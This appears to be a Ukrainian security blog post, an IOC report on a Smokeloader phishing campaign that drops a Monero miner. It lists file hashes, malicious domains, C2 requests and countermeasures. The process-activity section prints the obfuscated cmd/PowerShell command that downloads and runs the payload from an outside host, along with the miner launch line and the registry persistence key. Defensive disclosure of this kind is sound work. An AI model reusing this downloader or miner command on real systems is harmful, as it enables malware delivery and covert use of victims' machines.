IOC_smokeldr_150218

Доброго вечора, панове.

Сьогодні було зафіксовано повторну спробу доставки троянського коду типу Smokeloader (Chanitor).

Схема та ж сама, що ми вже бачили 30го числа та 6го числа.

Користувачі захисту кінцевих точок McAfee зверніть увагу – сам завантажувач та майнер детектуються.

Трохи аналітики:

  • Доставка – через обфусковані JS скрипти оболонці ZIP
  • Скрипт містить одну чітко вказану адресу, а основна частина записується з чітко заданим іменем файлу
  • Був використаний той же скрипт та ім’я сайту з минулої та позаминулої розсилки
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Цього разу цикл роботи повний – smokeloader спричинив завантаження та запуск Monero Miner.

 Схема атаки:

email > Attach (ZIP) > JS > WSCRIPT > CMD > Powershell > single hardcoded URL > GET > %temp%\11054.exe  (минулого разу - 63753.exe, позаминулого разу - 5541.exe)

Маркери IOC:

Приєднання (архів):

File name   Перечень.zip

SHA-256        ce848bb1cd63e5d12fe1a2da7b9f487282b061418dd5c8fcd6cf84b7456a3235

File size      21.72 KB

 

скрипт приманка:

File name   Описание продукции.js

SHA-256        4e54a1d40d583c655605a47ea36f69ea16bcc8df4e4d72370e3ebcfe71134a54

File size      18.88 KB

основна частина:

File name   crsse.exe >> 11054.exe >> rtdiubth.exe

SHA-256        5e8f227c91db834f536a016d014a277dd89f1e3b3e939761dc4847e260e9a89a

File size      300 KB

Monero miner:

File name   curl.exe

SHA-256    fc9a32ecce00b4b2d711fe9bda120c9f82f3c2405f3658d30f4dbdac5cedde26

File size      986.5 KB

Мережеві IOC:

 

завантаження payload – досі активна!

92.63.197.13      enterwords[.]ru   GET /uadoc/crsse.exe HTTP/1.1

(минулого разу - 104.31.86.241    enterwords[.]ru   GET /uadoc/crsse.exe HTTP/1.1)

трафік скомпрометованої системи – сервер контролю

92.63.197.13      honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

92.63.197.13      honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

92.63.197.13      honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

(минулого разу - 104.27.140.34    honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

 

Завантаження та активація Monero Miner

92.63.197.13      HTTP 134   parodadoca[.]ru  GET /panel/mr/curl.exe HTTP/1.1

92.63.197.13      HTTP 457   parodadoca[.]ru  GET /panel/gate.php?machine_id=?&x64=False&version=1&video_card=?cpu=?&junk=15.02.2018%2017:08:03 HTTP/1.1

92.63.197.13      HTTP 108   parodadoca[.]ru  GET /panel/updmr.php HTTP/1.1

92.63.197.13      HTTP 108   parodadoca[.]ru  GET /panel/updbt.php HTTP/1.1

Активність по процесам:

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell


"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Описание продукции.js"

"C:\Windows\System32\cmd.exe" /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3% $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\11054.exe';$http_request.open('GET', 'h11p:\enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

powershell  $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\11054.exe';$http_request.open('GET', ' h11p:\enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\11054.exe"

C:\Windows\SysWOW64\explorer.exe

C:\tmp\4A0C.tmp.exe

Запуск та ініціалізація майнера:

"C:\Users\operator\AppData\Roaming\MicroMon\curl.exe" -o pool.minexmr[.]com:4444 -u 43Zg4SdBjs3gh6g -p x --cpu-affinity 75

C:\Windows\SysWOW64\explorer.exe

Закріплення через HCU (так само як і минулого разу)

 

Clients                       c:\users\operator\appdata\roaming\microsoft\tjerrirf\rtdiubth.exe             

HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу Powershell (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements

Tags: , , , , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: